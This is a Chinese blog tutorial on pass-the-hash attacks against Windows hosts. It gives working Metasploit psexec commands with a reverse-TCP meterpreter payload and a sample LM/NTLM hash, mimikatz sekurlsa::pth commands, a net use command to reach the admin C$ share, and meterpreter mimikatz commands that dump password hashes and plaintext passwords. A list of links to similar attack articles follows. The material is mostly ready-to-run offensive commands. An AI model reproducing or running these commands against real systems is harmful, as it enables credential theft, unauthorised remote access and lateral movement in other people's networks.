哈希传递攻击(Pass-the-Hash)

最新推荐文章于 2024-07-21 11:00:00 发布
最新推荐文章于 2024-07-21 11:00:00 发布
阅读量1w 收藏 13
点赞数 4
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whoim_i/article/details/103648041
版权

目录

使用msf进行哈希传递攻击

有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口(文件共享)打开着。我们则可以利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(注意:只能是administrator用户的LM-hash和NTLM-hash,我试过几次其他用户的,发现不能成功)

msf > use  exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost 192.168.222.130
msf exploit(psexec) > set rhost 192.168.222.131
msf exploit(psexec) > set smbuser Administrator
msf exploit(psexec) > set smbpass 6d181cfaad0258eaaad3b435b51404ee: 9d482ae1705fd48c581e20a4123fb0dc   # 冒号前面为LM后面为NTLM
msf exploit(psexec) > exploit

在这里插入图片描述
成功拿到meterpreter
在这里插入图片描述

使用mimikatz进行哈希传递攻击PTH(工作组)

当我们获得了内网中一台主机的NTLM哈希值,我们可以利用mimikatz对这个主机进行哈希传递攻击,执行命令成功后将会反弹回cmd窗口

#使用administrator用户的NTLM哈希值进行攻击
sekurlsa::pth /user:administrator /domain:192.168.222.131 /ntlm:9d482ae1705fd48c581e20a4123fb0dc

执行命令,成功返回cmd
在这里插入图片描述
在弹出的cmd中,我们还可以直接连接该主机,还可以查看目录文件等操作

连接命令:net use \\192.168.222.131\c$

在这里插入图片描述
当然用其他用户的NTLM哈希值也是可以的,不过反弹回来的cmd权限就低了。

#使用man用户的NTLM哈希值进行攻击
sekurlsa::pth /user:man /domain:192.168.222.131 /ntlm:3dbde697d71690a769204beb12283678

在这里插入图片描述
另外:
在域环境中,如果我们拥有域内任意一台主机的本地administrator权限和管理员的NTLM哈希值,那么我们就可以利用域内某台主机使用mimikatz对域控进行哈希传递攻击。操作方法与上类似,只是连接的时候换成域控的地址。

meterpreter加载mimkatz模块获取用户密码

首先我们要先获取一个meterpreter权限过程省略了,然后加载mimikatz
命令:load mimikatz
在这里插入图片描述
用msv可以查看到用户密码的hash值
在这里插入图片描述
用kerberos可以获取用户的明文密码(或者wdigest和tspkg)
在这里插入图片描述
如果以上命令不行的话,我们可以执行mimikatz的命令来获取。

mimikatz_command -f samdump::hashes (意思是从windows的sam文件中读取密码hash值,windows密码存储在sam文件内)

在这里插入图片描述
获取明文的密码

mimikatz_command -f sekurlsa::searchPasswords

在这里插入图片描述

whoim_i
关注
  • 4
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1609
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
哈希传递攻击(Pass-the-Hash,PtH)
谢公子的博客
01-11 5215
目录 哈希传递攻击 MSF进行哈希传递攻击PtH(工作组) MSF进行哈希传递攻击PtH(域) mimikatz进行哈希传递攻击PtH(工作组) mimikatz进行哈希传递攻击PtH(域) 使用AES进行哈希传递攻击(PTK,Pass The Key) 更新KB2871997补丁产生的影响 哈希传递攻击 哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们...
内网渗透——哈希传递
来日可期的博客
10-09 1274
哈希传递攻击Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
内网安全:PTH PTK PTT
最新发布
qq_44005305的博客
07-21 1586
实验所用网络拓朴图网络环境说明​​​​​​​LM认证NTLM认证NTLM HashKerberos认证TGT票据服务票据Windows系统密码存储域控制器 - 用户登录 域用户 本地用户域用户和本地管理员用户登录Mimikatz抓取密码来源域内一台主机上可以得到非本地用户Hash的原因域横向移动:哈希传递攻击(PTH)- NTLM认证攻击PTH攻击原理利用方式一:Mimikatz利用方式二:Impacket利用方式三:CrackMapExec 密码喷射。
pth(pass the hash)哈希传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 2789
pth(pass-the-hash)哈希传递攻击在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码域/工作组环境账号hash内网中存在和当前机器相同的密码(ps:微软打了KB22871997补丁后只有Administrator(SID 500)可以PTH成功,默认windows server 2012后都会存在补丁)
哈希传递常用方法
路虽远,行将至。事虽难,做必达。
05-13 565
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。
内网横传之哈希传递Pass The Hash
11-25 7404
本文主要讲述如何使用msf 进行hash 传递以及遇到的一些问题
哈希传递攻击
weixin_45007073的博客
07-10 730
哈希传递概念散列值 概念 哈希传递通过找到与账户相关的密码散列值(NTLM Hash)来攻击。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,如果计算机的本地管理员账号和密码都是相同的,攻击者就能使用哈希传递方法登陆内网中的其他计算机。同时,通过哈希传递攻击攻击者不需要花时间破解密码散列值。 散列值在Windows中是用来证明身份的,攻击者往往会使用第三方工具来完成任务。在win2012之后的版本,默认内存中不会记录明文密码,因此攻击者往往会使用工具将散
哈希-hash
pang_tuan的博客
07-26 5457
其实我们只需要收集模i余数在根号n范围内的sum[i][j],如果我们输入的x<根号n,那么我们O(1)输出sum[x][y],否则我们用方法1,这个时候i+=x跨越度就非常大了,这样我们查询就分两类解决了。在此基础上,再建立一个溢出表,在之后的哈希操作中,无论关键字的同义词生成怎样的哈希地址,一旦发生冲突,就将其放入溢出表中。上例的整数我们用的10进制,如果把它迁移到一个字符串上,由于字符有26个,所以我们可以用一个大于26进制的进制来处理,一般选用131或1331或13331来作为字符串进制。...
哈希碰撞攻击
企鹅漫步
12-18 1860
哈希表碰撞攻击的基本原理 哈希表是一种查找效率极高的数据结构,很多语言都在内部实现了哈希表。PHP中的哈希表是一种极为重要的数据结构,不但用于表示Array数据类型,还在Zend虚拟机内部用于存储上下文环境信息(执行上下文的变量及函数均使用哈希表结构存储)。 理想情况下哈希表插入和查找操作的时间复杂度均为O(1),任何一个数据项可以在一个与哈希表长度无关的时间内计算出一个哈希值(key
hashpass-android:Android 的哈希传递实现
07-04
在Android平台上实现哈希传递的库,如`hashpass-android`,可以帮助开发者为用户提供更加安全的密码管理体验。这个库是与Stephan Boyer的Chrome插件完全兼容的,意味着Android应用可以利用相同的安全机制来生成和...
pass-the-hash-attacks-tools-mitigation_33283.pdf
06-18
### Pass-the-Hash攻击:工具与缓解方法 #### 概述 Pass-the-Hash(PTH)攻击是一种利用未加盐的密码散列进行身份冒充的技术。这种攻击主要发生在Windows域环境中,攻击者通过获取目标用户的哈希值,而不是实际密码,...
域渗透之Pass-the-hash
ToyCarryYou的博客
04-24 1124
域渗透 什么是AD域 AD的全称是Active Directory(活动目录) 是指windows服务器操作系统中的目录服务,它被包含在大多数windows sever操作系统中,负责集中式域管理及身份认证。AD域中是每个Windows域网络的基石。他负责存储域成员(包括设备和用户)的信息,验证其凭据并定义访问权限。运行此服务的服务器称为域控制器。AD域架构的常用对象包括以下四种 1.**组织单位...
内网渗透(三十七)之横向移动篇-Pass the Hash 哈希传递攻击(PTH)横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-17 532
主流的Windows操作系统,通常会使用 NTLM Hash对访问资源的用户进行身份验证。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本 地管理员账号和密码,因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就能使用哈希传递攻击的方法登 录内网中的其他计算机。在Windows网络中,散列值就是用来证明身份的(有正确的用户名和密码散列值,就能通过验证),而微软自己的产品和 工具显然不会支持这种攻击,于是,攻击者往往会使用第三方工具来完成任务。
内网渗透-哈希传递
qq_45953122的博客
10-18 404
哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、LM Hash都不需要明文密码,因此都可以被称为Hash传递攻击
正确传递hash引用
ace_fei的专栏
06-10 1222
    大家应该知道哈希引用需要初始化,这我就不多说了。    我就主要分享下传入哈希引用有两种方式    #!/usr/bin/perluse Data::Dumper;sub foo { my $h = shift; $h->{hello} = World!;}my $a;my $b = {};foo($a); print Dumper(
内网渗透之哈希传递
weixin_58954236的博客
10-09 373
哈希传递Pass The。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值